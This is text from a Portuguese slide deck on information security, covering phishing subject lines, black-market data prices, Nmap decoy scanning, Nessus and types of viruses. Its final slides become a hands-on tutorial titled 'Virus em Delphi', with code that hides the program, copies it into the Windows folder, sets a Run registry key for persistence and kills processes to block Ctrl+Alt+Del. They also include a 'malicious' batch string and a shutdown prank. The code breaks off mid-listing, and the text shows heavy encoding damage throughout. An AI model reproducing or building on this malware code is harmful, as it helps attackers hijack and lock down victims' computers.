domĂnio brasileiro (cujo nome nĂŁo foi divulgado por se tratar de um domĂnio legĂtimo
comprometido).
Em ataques XSS, pĂĄginas legĂtimas sĂŁo usadas de forma maliciosa e um cĂłdigo (no caso
acima, um FRAMESET1) ĂŠ inserido na pĂĄgina legĂtima. O conteĂşdo da pĂĄgina serĂĄ,
portanto, diferente do esperado.
145
146. Lista de Hackers fornecida:
¨ Amores On-line - cartão virtual - Equipe Carteiro Romântico - Uma pessoa que
lhe admira enviou um cartĂŁo
¨ As fotos que eu tinha prometido. Ălbum pessoal de fotos
¨ AVG AntivĂrus - Detectamos que seu E.Mail estĂĄ enviando mensagens
contaminadas com o vĂrus w32. bugbear
¨ Aviso - vocĂŞ estĂĄ sendo traĂdo - veja as fotos
¨ Aviso - vocĂŞ estĂĄ sendo traĂdo - veja as imagens do motel
¨ Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados -
Contrato Pendente - Clique para fazer atualização
¨ Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a
promoçþes exclusivas? Clique na fechadura
¨ Câmara dos Dirigentes Lojistas - SPC - Serviço de Proteção ao CrÊdito -
Notificação - Pendências Financeiras - Baixar o arquivo de relatório de
pendĂŞncias.
¨ carnaval 2005 - veja o que rolou nos bastidores do carnaval de São Paulo
¨ Cartão Terra - eu te amo - webcard enviado atravÊs do site Cartþes Terra
¨ Cartão UOL - I love you - você recebeu um cartão musical - Para visualizar e
ouvir escolha uma das imagens
¨ Cartþes BOL - Você recebeu um cartão BOL
¨ Cartþesnico.com - Seu amor criou um cartão para você
¨ Checkline - Consultas de crÊdito on-line - Consultas no Serasa/SPC
¨ Claro IdÊias - Grande chance de ganhar meio milhão de reais em ouro e 18
carros
¨ Colaneri e Campos Ltda - Ao Gerente de Vendas - orçamento de material e
equipamentos em urgĂŞncia
147. Lista de Hackers fornecida:
¨ Correio Virtual - hi5 - Seu Amor te enviou este cartão
¨ CPF cancelado ou pendente de regularização - verifique; seu CPF estå
cancelado
¨ Declaração de Imposto de Renda de 2005/06 - MinistÊrio da Fazenda - CPF
Cancelado ou Pendente de Regularização
¨ Ebay - your account could be suspended - Billing Department
¨ Embratel - Comunicado de Cobrança - Aviso de Bloqueio
¨ Embratel - Notificação Confidencial - Fatura de serviços prestados Clique para
detalhamento da fatura
¨ Emotion Cards - UOL - ParabÊns você recebeu um Presente Virtual
¨ Febraban - Guia de Segurança - Febrasoft Security
¨ Finasa - Nossa Caixa - Fraudes Bancårias - Febraban
¨ Fininvest - dÊbito em atraso - pendências financeiras em seu CPF/CNPJ
¨ Ganhe uma viagem a Paris - Guia Paris LumiÊre
¨ Gmail - Gmail Amigo Oculto - Baixar Formulårio - E-mail de 1 Giga
¨ Humortadela - Piada animada sempre amigos
¨ Humortadela - você Ê 10 - acesse o link e sacaneie
¨ Humortadela - você recebeu uma piada animada - Ver Piada Animada
¨ Ibest - acesso gråtis e fåcil - discador ibest - 0800 conexão sem pulso telefônico.
GrĂĄtis - Download
¨ Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vĂdeo
¨ Leiam esta informação IMPORTANTe
¨ Martins Com Ltda - Setor de Compras - Orçamento
¨ Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento
nĂŁo for quitado acionaremos departamento jurĂdico
148. Lista de Hackers fornecida:
¨ Olå, hå quanto tempo! Eu me mudei para os Estados Unidos, e perdemos
contato...
¨ Olha o que a Globo preparou para você neste ano de 2005 - Big Brother Brasil 5
- Baixe o vĂdeo
¨ Overture - Promoção para novos assinantes - Tem cliente procurando, tem você
oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar
¨ Paparazzo - globo. com - se vocĂŞ gostou de uma espiada no vĂdeo
¨ Parperfeito - Você foi adicionado aos prediletos - Associado do Par Perfeito
¨ Passe Livre de 7 dias no Globo Media Center
¨ Promoção Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu
fotolog e concorra
¨ Radio Terra - dedique uma música
¨ Receita Federal - CPF cancelado ou pendente de regularização
¨ Saudades de você - Sou alguÊm que te conheceu hå muito tempo, e tive que
fazer uma viagem - Espero que goste das fotos
¨ SERASA - pendências referentes a seu nome - Extrato de dÊbito
¨ SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dÊbitos
¨ Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mão
¨ Sou um amigo seu - vocĂŞ estĂĄ sendo traĂdo - veja as fotos
¨ Symantec - Faça sua atualização do Norton 2005 aqui - Gratuita - Licença para
1 ano grĂĄtis
¨ Terra Cartþes - O meu melhor presente Ê você
¨ Tim pós pago - pendências no SPC - Sistema de Proteção aoCrÊdito - Serial do
Celular
149. Lista de Hackers fornecida:
¨ Microsoft - Ferramenta de remoção de softwares Mal-Intencionados do Microsoft
Windows - Windows XP fica a cara de quem recebe um cartĂŁo Voxcards
¨ Microsoft Software - Este conteúdo foi testado e Ê fornecido a você pela
Microsoft Corporation - Veja as novidades
¨ Music Cards - Confirmação
¨ Necktsun ComÊrcio Ltda - Palmas - Departamento de Vendas - Orçamento
¨ Netcard Cartþes Virtuais - Emoçþes de verdade
¨ Norton AntivĂrus - Alerta de Segurança - download do antĂdoto para o Ms.
Bruner
¨ Notificação Confidencial - Pendências Financeiras em seu CPF
¨ O carteiro - você recebeu um cartão de quem te admira
¨ O carteiro. com - tenho uma novidade para você - veja o cartão que preparei
¨ Voxcards - cartão voxcards - para quem você vai mandar um cartão hoje?
¨ Voxcards - mensageiro - você estå recebendo um cartão virtual voxcards -
Precisa instalar o plugin - clique para instalar
¨ Webcard Terra - Feliz Dia das Mães - Existe um presente especial esperando
por vocĂŞ no site de cartĂľes do terra.
¨ Week - Complimentary Subscription Confirmation - Free - Please Apply online -
PC Week
¨ www. symantec. com - A solução AntivĂrus mais confiĂĄvel do mundo
¨ www.microsoft. com - Proteja seu computador com antivĂrus
150. Lista de Hackers fornecida:
¨ UOL - Promoção Cultural - Cara cadê meu carro
¨ UOL Cartþes - Estou com saudades - clique para visualizar
¨ UOL Cartþes - Seu amor lhe enviou um cartão - clique para baixar
¨ UOL Cartþes - Você recebeu um lindo cartão virtual
¨ Veja as fotos proibidas das musas do bbb5
¨ Viagens contaminadas com o w32. bugbear
¨ Virtual Cards - Um grande abraço da equipe virtual cards - ler cartão
¨ VIVO - Torpedos Web Gratuito - Torpedo Fåcil Vivo
¨ Yahoo Cartþes - Você Ê tudo para mim - clique na imagem
¨ Yahoo Cartþes - Você Ê tudo para mim - enviado por quem te admira
¨ Outra dica importante: nunca abra E-Mails de remetentes desconhecidos!
¨ Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)'
ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para
sairmos' , etc...
¨ E, finalmente, para ter certeza que ĂŠ de um golpe que vocĂŞ estĂĄ sendo vĂtima,
passe o mouse - sem clicar - pela palavra do direcionamento : vocĂŞ vai ver, na
barra inferior - Ă esquerda da tela -, que se trata de um arquivo com a
terminação 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vão) espionar seu
computador, roubando seus dados, senhas, etc.
151. Symantec: relatĂłrio mapeia mercado negro de dados
¨ Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O
relatório traz o preço das informaçþes negociadas por criminosos e mostra
como as empresas podem ter prejuĂzos com a vulnerabilidade dos dados dos
clientes.
Segundo Marcelo Silva, diretor de serviços da companhia no Brasil, jå existe um
ecossistema criado em torno do roubo de dados. âQuem rouba nem sempre
vende os dados. A gente fala de crime organizado, mas o que existe ĂŠ um
grande mercadoâ, afirma o executivo.
Veja tabela com o preço dos dados no mercado negro:
¨ Produto Preço
Contas bancĂĄrias de 10 dĂłlares a mil dĂłlares
CartĂľes de crĂŠdito de 0,40 dĂłlar a 20 dĂłlares
Identidades completas de 1 dĂłlar a 15 dĂłlares
Contas do eBay de 1 dĂłlar a 18 dĂłlares
Senhas de e-mail de 4 dĂłlares a 30 dĂłlares
Proxies de 1,5 dĂłlar a 30 dĂłlares
CW Connect - No grupo de discussĂŁo sobre Crimes Digitais do CW Connect,
a primeira rede social para profissionais de tecnologia da informação e
telecomunicaçþes do mercado, uma das participantes - a analista Fabiana -
inseriu uma pesquisa sobre as principais ameaças às informaçþes da empresa:
¨ 1 - VĂrus 75% (Por falta de conhecimento os usuĂĄrios baixam programas sem
conhecimento, acessam sites suspeitos, etc)
2 - Divulgação de senhas 57%
3 - Hackers 44%
4 - FuncionĂĄrios insatisfeitos 42%
5 - Acessos indevidos 40%
6 - Vazamento de informaçþes 33%
153. TÊcnicas para Alcançar os Objetivos
da Segurança
¨Deve-se perguntar:
153
â Proteger O QUĂ?
â Proteger DE QUEM?
â Proteger A QUE CUSTOS?
â Proteger COM QUE RISCOS?
¨O axioma da segurança Ê bastante
conhecido de todos, mas ĂŠ verdadeiro:
â "Uma corrente nĂŁo ĂŠ mais forte do que o
seu elo mais fraco"
156. AA mmaaiioorriiaa ddooss
aattaaqquueess
aaccoonntteeccee aaqquuii
PPrroodduuttoo
LLaannççaaddoo
VVuullnneerraabbiilliiddaaddee
ddeessccoobbeerrttaa
FFiixx
ddiissppoonnĂĂvveell
FFiixx iinnssttaallaaddoo
ppeelloo cclliieennttee
Atualização do ambiente
Quando as ameaças ocorrem?
157. Atualização do ambiente
Tempo para a invasĂŁo diminuindo
PPrroodduuttoo
LLaannççaaddoo
InvasĂŁo
O tempo (em dias)
entre a disponibilização
VVuullnneerraabbiilliiddaaddee
ddeessccoobbeerrttaa
da correção e a
FFiixx
ddiissppoonnĂĂvveell
FFiixx iinnssttaallaaddoo
ppeelloo cclliieennttee
invasĂŁo tem diminuĂdo,
portanto a aplicação de
âpatchesâ nĂŁo pode ser
a Ăşnica defesa em
grandes empresas
18 151
0
331
BBllaassttee
rr
WWeellcchhii
aa//
NNaacchhii
NNiimmdd
aa
25
SSQQLL
SSllaammmm
eerr
14
SSaasssseerr
158. Atualização do ambiente
Worm Zotob
¨ 09/08 - A Microsoft
publica a correção
¨ 11/08 - A Microsoft
informa que um
ataque estĂĄ na
eminencia de
acontecer sobre essa
vulnerabilidade
¨ 17/08 - CNN e ABC
sĂŁo atacadas
159. Principais Ameaças
9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
160. Principais ObstĂĄculos
9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
161. Anålise de Segurança
161
¨ São falhas em serviços, aplicativos e sistemas
operacionais que pode acarretar acesso ao
sistemas parcial ou total em nĂvel de
administração.
¨ Hoje temos ferramentas de escaneamento de
vulnerabilidades que detecta falhas de sistemas,
mais tambĂŠm sĂŁo utilizadas para invasĂŁo.
¨ Segundo o site sectools.org temos as 10 principais
ferramentas de escaneamento de vulnerabilidades
de sistemas.
â Nessus, GFI LANguard, Retina, Core Impact,
ISS Internet Scanner, X-scan, Sara,
QualysGuard, SAINT, MBSA
162. 162
Soluçþes para a Insegurança
InformĂĄtica
¨NMAP
- à uma ferramenta para exploração de rede criada
pelo Fyodor. Ă uma das ferramentas mais
importantes para engenharia de segurança ou pen-tester.
Com ele vocĂŞ poderĂĄ entrar em uma rede e
buscar serviços que estão escutando em cada porta
especifica. VocĂŞ pode fazer um varredura de
tcp()connect que farĂĄ uma conexĂŁo completa com o
host ou uma syn scan que farĂĄ uma simples conexĂŁo
que servirĂĄ para testar regras de firewall por
exemplo.
163. 163
Soluçþes para a Insegurança
InformĂĄtica
¨NMAP (I)
Alvo:
MS-Windows 95
modificado
164. 164
Soluçþes para a Insegurança
InformĂĄtica
¨NMAP (II)
Alvo:
Linux Mandrake
modificado
165. 165
Soluçþes para a Insegurança
Informåtica ¨NMAP (comandos)
Um rastreio(scan)
tĂpico do Nmap ĂŠ
mostrado em
Example 1, âUma
amostra de
rastreio(scan) do
Nmapâ. Os Ăşnicos
argumentos que o
Nmap utiliza nesse
exemplo sĂŁo -A para
permitir a detecção de
SO e a versĂŁo -T4
para execução mais
rĂĄpida e os nomes de
anfitriĂŁo(hostnames)
de dois alvos.
166. 166
Soluçþes para a Insegurança
Informåtica ¨NMAP (comandos - Ubuntu)
Version detection:
ApĂłs as portas TCP
e/ou UDP serem
descobertas por
algum dos mĂŠtodos, o
nmap irĂĄ determinar
qual o serviço estå
rodando atualmente.
O arquivo nmap-service-
probes ĂŠ
utilizado para
determinar tipos de
protocolos, nome da
aplicação, número da
versĂŁo e outros
detalhes
167. 167
Soluçþes para a Insegurança
InformĂĄtica
¨NMAP (comandos - Ubuntu)
D <decoy1,[decoy2],[SEU_IP]...>
Durante uma varredura, utiliza uma sĂŠrie de
endereços falsificados, simulando que o scanning
tenha originado desses vĂĄrios hosts, sendo
praticamente impossĂvel identificar a verdadeira
origem da varredura.
sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP
192.168.0.1
168. 168
Soluçþes para a Insegurança
InformĂĄtica
¨ Anålise de Segurança
â MĂŠtodo de detecção remota de vulnerabilidades
⢠Aplicaçþes como o NMAP não tiram conclusþes
⢠Existe outro tipo de aplicação que efectua o levantamento
remoto de recursos, detecta vulnerabilidades, alerta o utilizador
ou lança ataques
â NESSUS (Nessus Security Scanner)
⢠à uma ferramenta sofisticada que funciona de forma semi-automåtica
⢠Pode ser usada para obter relatórios de segurança informåtica
⢠TambĂŠm pode ser utilizada para âatacar â uma plataforma
⢠Incorpora ataques de negação de serviço, teste de exploits, etc
⢠Facilita muito a actividade dos crackers
169. 169
Soluçþes para a Insegurança
InformĂĄtica
¨NESSUS
- AtĂŠ hĂĄ pouco tempo o Nessus sĂł funcionava no Linux, mas
recentemente foi lançado o Nessus para Windows. à uma
excelente ferramenta designada para testar e descobrir falhas
de segurança (portas, vulnerabilidades, exploits) de uma ou
mais mĂĄquinas.
- Estas falhas ou problemas podem ser descobertos por um grupo
hacker, um único hacker, uma empresa de segurança ou pelo
prĂłprio fabricante, podendo ser de maneira acidental ou
proposital, O Nessus ajuda a identificar e resolver estes
problemas antes que alguĂŠm tire vantagem destes com
propĂłsitos maliciosos.
170. 170
Soluçþes para a Insegurança
InformĂĄtica
¨NESSUS
Alvo: Linux
SuSE
Detectando
Nmap
171. 171
Soluçþes para a Insegurança
InformĂĄtica
¨NESSUS
Alvo: MS-Windows
95
Detectando
Nmpa
172. 172
Soluçþes para a Insegurança
InformĂĄtica
¨NESSUS
Alvo: Linux RedHat após instalação
173. 173
Soluçþes para a Insegurança
InformĂĄtica
¨NESSUS
Verificação da
pĂłpria mĂĄquina
177. Tipos de Virus
¨ VĂrus de Boot
Um dos primeiros tipos de vĂrus conhecido, o vĂrus de boot infecta a
partição de inicialização do sistema operacional. Assim, ele Ê ativado
quando o computador ĂŠ ligado e o sistema operacional ĂŠ carregado.
¨ Time Bomb
Os vĂrus do tipo "bomba de tempo" sĂŁo programados para se ativarem
em determinados momentos, definidos pelo seu criador. Uma vez
infectado um determinado sistema, o vĂrus somente se tornarĂĄ ativo e
causarĂĄ algum tipo de dano no dia ou momento previamente definido.
Alguns vĂrus se tornaram famosos, como o "Sexta-Feira 13" e o
"Michelangelo".
Minhocas, worm ou vermes
Com o interesse de fazer um vĂrus se espalhar da forma mais
abrangente possĂvel, seus criadores por vezes, deixaram de lado o
desejo de danificar o sistema dos usuĂĄrios infectados e passaram a
programar seus vĂrus de forma que apenas se repliquem, sem o
objetivo de causar graves danos ao sistema. Desta forma, seus autores
visam tornar suas criaçþes mais conhecidas na Internet. Este tipo de
vĂrus passou a ser chamada de verme ou worm. Eles estĂŁo mais
aperfeiçoados, jå hå uma versão que ao atacar a måquina hospedeira,
nĂŁo sĂł se replica, mas tambĂŠm se propaga pela internet pelos e-mail
que estĂŁo registrados no cliente de e-mail, infectando as mĂĄquinas que
abrirem aquele e-mail, reiniciando o ciclo
178. Tipos de Virus (cont) ¨ Trojans ou cavalos de Tróia
Certos vĂrus trazem em seu bojo um cĂłdigo a parte, que permite a um estranho acessar o
micro infectado ou coletar dados e enviĂĄ-los pela Internet para um desconhecido, sem notificar
o usuĂĄrio. Estes cĂłdigos sĂŁo denominados de Trojans ou cavalos de TrĂłia.
Inicialmente, os cavalos de TrĂłia permitiam que o micro infectado pudesse receber comandos
externos, sem o conhecimento do usuĂĄrio. Desta forma o invasor poderia ler, copiar, apagar e
alterar dados do sistema. Atualmente os cavalos de TrĂłia agora procuram roubar dados
confidenciais do usuĂĄrio, como senhas bancĂĄrias.
Os vĂrus eram no passado, os maiores responsĂĄveis pela instalação dos cavalos de TrĂłia,
como parte de sua ação, pois eles não têm a capacidade de se replicar. Atualmente, os
cavalos de TrĂłia nĂŁo mais chegam exclusivamente transportados por vĂrus, agora sĂŁo
instalados quando o usuĂĄrio baixa um arquivo da Internet e o executa. PrĂĄtica eficaz devido a
enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usuĂĄrios. Tais
e-mails contĂŠm um endereço na Web para a vĂtima baixar o cavalo de TrĂłia, ao invĂŠs do
arquivo que a mensagem diz ser. Esta prĂĄtica se denomina phishing,expressĂŁo derivada do
verbo to fish, "pescar" em inglĂŞs. Atualmente, a maioria dos cavalos de TrĂłia visam sites
bancĂĄrios, "pescando" a senha digitada pelos usuĂĄrios dos micros infectados. HĂĄ tambĂŠm
cavalos de TrĂłia que ao serem baixados da internet "guardados" em falsos programas ou em
anexos de e-mail, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt
dĂĄ as "regras do jogo": os dados foram "seqĂźestrados" e sĂł serĂŁo "libertados" mediante
pagamento em dinheiro para uma determinada conta bancĂĄria, quando serĂĄ fornecido o cĂłdigo
restaurador. TambĂŠm os cavalos de trĂłia podem ser usados para levar o usuĂĄrio para sites
falsos, onde sem seu conhecimento, serĂŁo baixados trojans para fins criminosos, como
aconteceu com os links do google, pois uma falha de segurança poderia levar um usuårio para
uma pågina falsa. Por este motivo o serviço esteve fora do ar por algumas horas para corrigir
esse bug, pois caso contrĂĄrio as pessoas que nĂŁo distinguissem o site original do falsificado
seriam afetadas.
¨ Hijackers
Hijackers sĂŁo programas ou scripts que "sequestram" navegadores de Internet, principalmente
o Internet Explorer. Quando isso ocorre, o hijacker altera a pĂĄgina inicial do browser e impede
o usuĂĄrio de mudĂĄ-la, exibe propagandas em pop-ups ou janelas novas, instala barras de
ferramentas no navegador e podem impedir acesso a determinados sites (como sites de
software antivĂrus, por exemplo).
179. Tipos de Virus (cont)
¨ VĂrus no Orkut
Em torno de 2006 e 2007 houve muitas ocorrĂŞncias de vĂrus no Orkut que ĂŠ
capaz de enviar scraps (recados) automaticamente para todos os contatos da
vĂtima na rede social, alĂŠm de roubar senhas e contas bancĂĄrias de um micro
infectado atravĂŠs da captura de teclas e cliques. Apesar de que aqueles que
receberem o recado precisam clicar em um link para se infectar, a relação de
confiança existente entre os amigos aumenta muito a possibilidade de o
usuĂĄrio clicar sem desconfiar de que o link leva para um worm. Ao clicar no
link, um arquivo bem pequeno ĂŠ baixado para o computador do usuĂĄrio. Ele se
encarrega de baixar e instalar o restante das partes da praga, que enviarĂĄ a
mensagem para todos os contatos do Orkut. AlĂŠm de simplesmente se
espalhar usando a rede do Orkut, o vĂrus tambĂŠm rouba senhas de banco, em
outras palavras, ĂŠ um clĂĄssico Banker.
¨ Keylogger
O KeyLogger ĂŠ uma das espĂŠcies de vĂrus existentes, o significado dos termos
em inglĂŞs que mais se encaixa no contexto seria: Capturador de teclas . Ao
serem executados, normalmente os keyloggers ficam escondidos no sistema
operacional, sendo assim a vĂtima nĂŁo tem como saber que estĂĄ sendo
monitorada. Atualmente os keyloggers sĂŁo desenvolvidos para meios ilĂcitos,
como por exemplo roubo de senhas bancĂĄrias. SĂŁo utilizados tambĂŠm por
usuĂĄrios com um pouco mais de conhecimento para poder obter senhas
pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers
que capturam a tela da vĂtima, sendo assim, quem implantou o keylogger tem
controle sobre o que a pessoa estĂĄ fazendo no computador.
¨ Estado Zumbi
O estado zumbi em um computador ocorre quando ĂŠ infectado e estĂĄ sendo
controlado por terceiros. Podem usĂĄ-lo para disseminar, vĂrus , keyloggers, e
procededimentos invasivos em geral. Usualmente esta situação ocorre pelo
fato da mĂĄquina estar com seu Firewall e ou Sistema Operacional
desatualizados. Segundo estudos na ĂĄrea, um computador que estĂĄ na
internet nessas condiçþes tem quase 50% de chance de se tornar uma
mĂĄquina zumbi, que dependendo de quem estĂĄ controlando, quase sempre
com fins criminosos, como acontece vez ou outra, quando crackers sĂŁo presos
por formar exĂŠrcitos zumbis para roubar dinheiro das contas correntes e
extorquir.
180. Tipos de Virus (cont)
¨ VĂrus de E-mail
AtĂŠ pouco tempo atrĂĄs nĂŁo existiam vĂrus de E-mail e todos os textos que circulavam
sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se
propagam por mails e nĂŁo necessitam que se execute qualquer programa anexado ou
nĂŁo a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia.
KakWorm : SĂł ataca as versĂľes inglesa e francesa do Outlook. Para que a
contaminação aconteça basta que uma mensagem contaminada seja exibida no
âpainel de visualizaçãoâ, sem necessidade de abrir o mail. AlĂŠm de sua
autopropagação, o principal efeito consiste no desligamento do computador. Ele se
aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as
mensagens levarĂŁo consigo o KakWorm. Todo primeiro dia do mĂŞs, Ă s17hs, ĂŠ
apresentada a mensagem: âKagou-Anti-Kro$oft says not today!â. Em seguida, o
computador ĂŠ desligado.
Romeu e Julieta : Ataca os computadores que usam as versĂľes 4.0, 4.01, 5.0, e
5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98,
Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa
instabilidades no computador contaminado. Uma caracterĂstica desse worm ĂŠ que o
assunto (subject) da mensagem que contĂŠm o vĂrus varia e ĂŠ selecionado
aleatoriamente entre os seguintes:
Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? -
lol :) - ,,,⌠- !!! - newborn - merry christmas! - surprise ! - Caution: NEW
VIRUS ! - scandal ! - ^_^ - Re: - Romeo&Juliet - <> :)))))) - hello world
- !!??!?!? - subject - ble bla, bee - I Love You ;) - sorry⌠- Hey you ! -
Matrix has you⌠- my picture from shake-beer
Davinia: Ă capaz de contaminar e de autopropagar-se sem a existĂŞncia de um
arquivo anexado Ă mensagem, danifica todos os arquivos .html e os deixa
irrecuperĂĄveis.
181. Tipos de Virus (cont)
¨ VĂrus de macro
Quando se usa alguns programas, por exemplo um editor de texto, e
necessita-se executar uma tarefa repetidas vezes em seqßência
(por exemplo substituir todos os âehâ por âĂŠâ) pode-se editar um
comando Ăşnico para efetuĂĄ-las. Esse comando ĂŠ chamado de
macro, que pode ser salvo em um modelo para ser aplicado em
outros arquivos. AlÊm dessa opção da própria pessoa fazer um
modelo os comandos bĂĄsicos dos editores de texto tambĂŠm
funcionam com modelos. Os vĂrus de macro atacam justamente
esses arquivos comprometendo o funcionamento do programa. Os
alvos principais sĂŁo os prĂłprios editores de texto (Word) e as
planilhas de cĂĄlculo (Excel).
A disseminação desse tipo de vĂrus ĂŠ muito mais acentuada pois
documentos sĂŁo muito mĂłveis e passam de mĂĄquina em mĂĄquina .
Ao escrever, editar ou, simplesmente, ler arquivos vindos de
computadores infectados a contaminação ocorre. Assim,
verdadeiras âepidemiasâ podem acontecer em pouco tempo. AlĂŠm
disso, os macrovĂrus constituem a primeira categoria de vĂrus
multiplataforma, ou seja, nĂŁo se limitam aos computadores
pessoais, podendo infectar tambĂŠm outras plataformas que usem o
mesmo programa, como o Macintosh, por exemplo.
182. Phishing scam
¨ Bastante comum, esse tipo de golpe virtual Ê
baseado no envio de e-mails sugerindo que os
internautas baixem arquivos ou visitem sites
maliciosos. Outra possibilidade para enganar os
usuĂĄrios da web ĂŠ a oferta de links, tambĂŠm para
pĂĄginas fraudulentas, em variados sites, blogs e
redes sociais.
Quando aceitam a sugestĂŁo dos piratas, abrindo os
arquivos ou visitando esses endereços, as vĂtimas
em potencial podem infectar seus computadores
involuntariamente com programas maliciosos.
Geralmente, essas pragas instaladas na mĂĄquina
têm como objetivo roubar informaçþes pessoais dos
usuĂĄrios de internet.
182
185. O que significa SPAM
¨ O termo SPAM origina-se de um programa
de sĂŠrie inglesa de comĂŠdia onde os clientes
pediam repetidamente âSPAMâ, marca de um
presunto enlatado americano.
¨ Na informåtica significa enviar mensagens
para qualquer quantidade de usuĂĄrios, sem
obter prÊvia autorização.
186. Como Evitar SPAM
¨ Existem diversas formas de bloqueio de mensagens
nĂŁo solicitadas. VĂĄrios programas fazem esse
serviço, como por exemplo, o SPAM Assassin.
SĂŁo configurados para bloquear as mensagens
vindas de endereços conhecidos que disseminam
essas mensagens. Bloqueia-se tambĂŠm as
mensagens contendo alguma palavra ou expressĂŁo
especĂfica, por exemplo:
¨ âCompre um notebookâ
¨ âTroque seus cartuchos de impressorasâ
¨ âFree teen imagesâ
188. 188
Posso enviar um vĂrus por brincadeira?
NĂŁo! Mesmo por brincadeira, enviar um vĂrus de computador
pode configurar crime de dano.
Certifique-se que os anexos transmitidos sĂŁo arquivos benignos e
Ăşteis ao destinatĂĄrio.
CĂłdigo Penal
Dano
Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia:
Pena - detenção, de um a seis meses, ou multa.
Um vĂrus pode se propagar de diversas formas.
ď§ anexo
ď§ download
ď§ engenharia social
189. PossĂveis danos
¨ Perda de desempenho do micro;
¨ Exclusão de arquivos;
¨ Alteração de dados;
¨ Acesso a informaçþes confidenciais por
pessoas nĂŁo autorizadas;
¨ Perda de desempenho da rede (local e
Internet);
¨ Monitoramento de utilização (espiþes);
¨ Desconfiguração do Sistema Operacional.
¨ Inutilizarão de determinadas peças.
195. CĂłdigo de VĂrus
¨ Teste
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-
195
ANTIVIRUS-TEST-FILE!$H+H*
¨ Malicioso (Salvar no Bloco de Nota
Vassoura.exe)
AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE...
AIL.COM/AMDWIN@*.*
197. CĂłdigo de VĂrus (cont)
¨ virus.bat
Criem um atalho e na localização escrevam "
shutdown -s -t 60 -c " qualquer coisa que
queiram dizer, mas tem de ser entre aspas"
T (TEMPO EM SEGUNDOS) Podem mudar
C (ComentĂĄrio)
197
198. Virus em Delphi
¨ Existe muitas maneiras de criar um virus em
delphi, a maioria dos trojans famosos que
circulĂŁo n internet foram feitos em delphi.
Eu vou mostrar como fazer um virus reninciar
junto com o windows e travar o Ctrl + Alt +
Del.
¨ Vamos la, Primeiro abra um projeto e
coloque na uses "Registry,"
¨ Agora em baixo de "{$R *.dfm}"
coloque isso:
198
199. procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean );
var
sKey : string;
reg : TRegIniFile;
begin
if( bRunOnce )then
begin
sKey := 'Once'
end
else
begin
sKey := '';
end;
reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString('SoftwareMicrosoft' + 'WindowsCurrentVersionRun'+ sKey +
#0, sProgTitle, sCmdLine );
reg.Free;
end;
Agora no FormCreate coloque isso:
procedure TForm1.FormCreate(Sender: TObject);
begin
Application.ShowMainForm := False;
CopyFile(PChar(Application.ExeName),'C:WINDOWSvirus.exe',True);
RunOnStartup('virus','C:WINDOWSvirus.exe',true);
end;
199
200. ¨ Agora vamos fazer a par te de travar a listagem de
processos, vou dar o coder todo basta voce fazer sua ar te:
unit Unit1; interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms,
Dialogs, TLHelp32, PsAPI, ExtCtrls; type
TForm1 = class(TForm)
Timer1: TTimer;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end; var
Form1: TForm1; implementation {$R *.dfm} function
TerminarProcesso(sFile: String): Boolean;
var
verSystem: TOSVersionInfo;
hdlSnap,hdlProcess: THandle;
bPath,bLoop: Bool;
peEntry: TProcessEntry32;
arrPid: Array [0..1023] of DWORD;
iC: DWord;
k,iCount: Integer;
arrModul: Array [0..299] of Char;
hdlModul: HMODULE;
begin
Result := False;
if ExtractFileName(sFile)=sFile then
bPath:=false
else
bPath:=true;
verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
GetVersionEx(verSystem);
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then
begin
hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
peEntry.dwSize:=Sizeof(peEntry);
bLoop:=Process32First(hdlSnap,peEntry);
while integer(bLoop)<>0 do
begin
if bPath then
begin
if CompareText(peEntry.szExeFile,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr
y.th32ProcessID), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntr
y.th32ProcessID), 0);
Result := True;
end;
end;
200
bLoop := Process32Next(hdlSnap,peEntry);
end;
CloseHandle(hdlSnap);
end
else
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then
begin
EnumProcesses(@arrPid,SizeOf(arrPid),iC);
iCount := iC div SizeOf(DWORD);
for k := 0 to Pred(iCount) do
begin
hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or
PROCESS_VM_READ,false,arrPid [k]);
if (hdlProcess<>0) then
begin
EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC);
GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul)
);
if bPath then
begin
